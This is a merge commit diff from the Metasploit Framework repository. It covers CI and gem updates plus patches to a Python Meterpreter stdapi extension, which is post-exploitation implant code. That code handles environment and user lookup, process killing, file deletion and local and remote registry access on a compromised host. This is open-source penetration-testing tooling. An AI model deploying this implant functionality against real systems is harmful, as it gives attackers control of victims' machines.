Merge remote-tracking branch 'upstream/master' into add_cisco_ssl_vpn_priv_esc

Author: Jonathan Claudius

.gitignore

@@ -83,3 +83,7 @@ data/meterpreter/screenshot.*.dll
 # private source. If you're interested in this functionality,
 # check out Metasploit Pro: http://metasploit.com/download
 data/meterpreter/ext_server_pivot.*.dll
+
+# Avoid checking in metakitty, the source for
+# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
+/metakitty

.travis.yml

@@ -1,6 +1,7 @@
 env:
   - RAKE_TASK=cucumber
-  - RAKE_TASK=cucumber:boot
+# Commenting out the boot tests due to chronic timeouts.
+#  - RAKE_TASK=cucumber:boot
   - RAKE_TASK=spec SPEC_OPTS="--tag content"
   - RAKE_TASK=spec SPEC_OPTS="--tag ~content"
 
@@ -35,3 +36,9 @@ notifications:
 
 git:
   depth: 5
+
+# Blacklist certain branches from triggering travis builds
+branches:
+  except:
+    - gh-pages
+    - metakitty

Gemfile.lock

@@ -22,7 +22,7 @@ PATH
       tzinfo
     metasploit-framework-db (4.10.1.pre.dev)
       activerecord (< 4.0.0)
-      metasploit-credential (~> 0.13.3)
+      metasploit-credential (~> 0.13.6)
       metasploit-framework (= 4.10.1.pre.dev)
       metasploit_data_models (~> 0.21.1)
       pg (>= 0.11)
@@ -62,7 +62,7 @@ GEM
       i18n (~> 0.6, >= 0.6.4)
       multi_json (~> 1.0)
     arel (3.0.3)
-    arel-helpers (2.0.1)
+    arel-helpers (2.0.2)
       activerecord (>= 3.1.0, < 5)
     aruba (0.6.1)
       childprocess (>= 0.3.6)
@@ -112,7 +112,7 @@ GEM
     metasploit-concern (0.3.0)
       activesupport (~> 3.0, >= 3.0.0)
       railties (< 4.0.0)
-    metasploit-credential (0.13.3)
+    metasploit-credential (0.13.6)
       metasploit-concern (~> 0.3.0)
       metasploit-model (~> 0.28.0)
       metasploit_data_models (~> 0.21.0)
@@ -139,7 +139,7 @@ GEM
     msgpack (0.5.9)
     multi_json (1.0.4)
     network_interface (0.0.1)
-    nokogiri (1.6.4.1)
+    nokogiri (1.6.5)
       mini_portile (~> 0.6.0)
     packetfu (1.1.9)
     pcaprub (0.11.3)
@@ -171,11 +171,11 @@ GEM
       rake (>= 0.8.7)
       rdoc (~> 3.4)
       thor (>= 0.14.6, < 2.0)
-    rake (10.3.2)
+    rake (10.4.2)
     rb-readline (0.5.1)
     rdoc (3.12.2)
       json (~> 1.4)
-    recog (1.0.5)
+    recog (1.0.6)
       nokogiri
     redcarpet (3.1.2)
     rkelly-remix (0.0.6)

data/exploits/CVE-2014-4404/key_exploit

@@ -60,9 +60,13 @@
 	bytes = lambda *args: str(*args[:1])
 	NULL_BYTE = '\x00'
 else:
-	is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
+	if isinstance(__builtins__, dict):
+		is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
+		str = lambda x: __builtins__['str'](x, 'UTF-8')
+	else:
+		is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
+		str = lambda x: __builtins__.str(x, 'UTF-8')
 	is_bytes = lambda obj: issubclass(obj.__class__, bytes)
-	str = lambda x: __builtins__['str'](x, 'UTF-8')
 	NULL_BYTE = bytes('\x00', 'UTF-8')
 	long = int
 
@@ -501,6 +505,8 @@ class RTATTR(ctypes.Structure):
 IFA_ADDRESS    = 1
 IFA_LABEL      = 3
 
+meterpreter.register_extension('stdapi')
+
 def calculate_32bit_netmask(bits):
 	if bits == 32:
 		return 0xffffffff
@@ -669,8 +675,10 @@ def channel_open_stdapi_net_tcp_server(request, response):
 @meterpreter.register_function
 def stdapi_sys_config_getenv(request, response):
 	for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE):
-		pgroup = ''
-		env_var = env_var['value'].translate(None, '%$')
+		pgroup = bytes()
+		env_var = env_var['value']
+		env_var = env_var.replace('%', '')
+		env_var = env_var.replace('$', '')
 		env_val = os.environ.get(env_var)
 		if env_val:
 			pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var)
@@ -682,23 +690,25 @@ def stdapi_sys_config_getenv(request, response):
 def stdapi_sys_config_getsid(request, response):
 	token = get_token_user(ctypes.windll.kernel32.GetCurrentProcess())
 	if not token:
-		return ERROR_FAILURE, response
+		return error_result_windows(), response
 	sid_str = ctypes.c_char_p()
 	if not ctypes.windll.advapi32.ConvertSidToStringSidA(token.User.Sid, ctypes.byref(sid_str)):
-		return ERROR_FAILURE, response
+		return error_result_windows(), response
 	sid_str = str(ctypes.string_at(sid_str))
 	response += tlv_pack(TLV_TYPE_SID, sid_str)
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
 def stdapi_sys_config_getuid(request, response):
-	if has_windll:
+	if has_pwd:
+		username = pwd.getpwuid(os.getuid()).pw_name
+	elif has_windll:
 		token = get_token_user(ctypes.windll.kernel32.GetCurrentProcess())
 		if not token:
-			return ERROR_FAILURE, response
+			return error_result_windows(), response
 		username = get_username_from_token(token)
 		if not username:
-			return ERROR_FAILURE, response
+			return error_result_windows(), response
 	else:
 		username = getpass.getuser()
 	response += tlv_pack(TLV_TYPE_USER_NAME, username)
@@ -786,9 +796,9 @@ def stdapi_sys_process_kill(request, response):
 			k32 = ctypes.windll.kernel32
 			proc_h = k32.OpenProcess(PROCESS_TERMINATE, False, pid)
 			if not proc_h:
-				return ERROR_FAILURE, response
+				return error_result_windows(), response
 			if not k32.TerminateProcess(proc_h, 0):
-				return ERROR_FAILURE, response
+				return error_result_windows(), response
 		elif hasattr(os, 'kill'):
 			os.kill(pid, 9)
 		else:
@@ -855,7 +865,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
 	proc_snap = k32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
 	result = k32.Process32First(proc_snap, ctypes.byref(pe32))
 	if not result:
-		return ERROR_FAILURE, response
+		return error_result_windows(), response
 	while result:
 		proc_h = k32.OpenProcess((PROCESS_QUERY_INFORMATION | PROCESS_VM_READ), False, pe32.th32ProcessID)
 		if not proc_h:
@@ -935,8 +945,7 @@ def stdapi_fs_delete_dir(request, response):
 @meterpreter.register_function
 def stdapi_fs_delete_file(request, response):
 	file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
-	if os.path.exists(file_path):
-		os.unlink(file_path)
+	os.unlink(file_path)
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
@@ -1338,10 +1347,10 @@ def stdapi_registry_create_key(request, response):
 	base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
 	permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
 	res_key = ctypes.c_void_p()
-	if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
-		response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
-		return ERROR_SUCCESS, response
-	return ERROR_FAILURE, response
+	if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) != ERROR_SUCCESS:
+		return error_result_windows(), response
+	response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
+	return ERROR_SUCCESS, response
 
 @meterpreter.register_function_windll
 def stdapi_registry_delete_key(request, response):
@@ -1432,33 +1441,31 @@ def stdapi_registry_open_key(request, response):
 	base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
 	permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
 	handle_id = ctypes.c_void_p()
-	if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
-		response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
-		return ERROR_SUCCESS, response
-	return ERROR_FAILURE, response
+	if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) != ERROR_SUCCESS:
+		return error_result_windows(), response
+	response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
+	return ERROR_SUCCESS, response
 
 @meterpreter.register_function_windll
 def stdapi_registry_open_remote_key(request, response):
 	target_host = packet_get_tlv(request, TLV_TYPE_TARGET_HOST)['value']
 	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 	result_key = ctypes.c_void_p()
-	result = ctypes.windll.advapi32.RegConnectRegistry(target_host, root_key, ctypes.byref(result_key))
-	if (result == ERROR_SUCCESS):
-		response += tlv_pack(TLV_TYPE_HKEY, result_key.value)
-		return ERROR_SUCCESS, response
-	return ERROR_FAILURE, response
+	if ctypes.windll.advapi32.RegConnectRegistry(target_host, root_key, ctypes.byref(result_key)) != ERROR_SUCCESS:
+		return error_result_windows(), response
+	response += tlv_pack(TLV_TYPE_HKEY, result_key.value)
+	return ERROR_SUCCESS, response
 
 @meterpreter.register_function_windll
 def stdapi_registry_query_class(request, response):
 	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
 	value_data = (ctypes.c_char * 4096)()
 	value_data_sz = ctypes.c_uint32()
 	value_data_sz.value = ctypes.sizeof(value_data)
-	result = ctypes.windll.advapi32.RegQueryInfoKeyA(hkey, value_data, ctypes.byref(value_data_sz), None, None, None, None, None, None, None, None, None)
-	if result == ERROR_SUCCESS:
-		response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data))
-		return ERROR_SUCCESS, response
-	return ERROR_FAILURE, response
+	if ctypes.windll.advapi32.RegQueryInfoKeyA(hkey, value_data, ctypes.byref(value_data_sz), None, None, None, None, None, None, None, None, None) != ERROR_SUCCESS:
+		return error_result_windows(), response
+	response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data))
+	return ERROR_SUCCESS, response
 
 @meterpreter.register_function_windll
 def stdapi_registry_query_value(request, response):
@@ -1486,7 +1493,7 @@ def stdapi_registry_query_value(request, response):
 		else:
 			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
 		return ERROR_SUCCESS, response
-	return ERROR_FAILURE, response
+	return error_result_windows(), response
 
 @meterpreter.register_function_windll
 def stdapi_registry_set_value(request, response):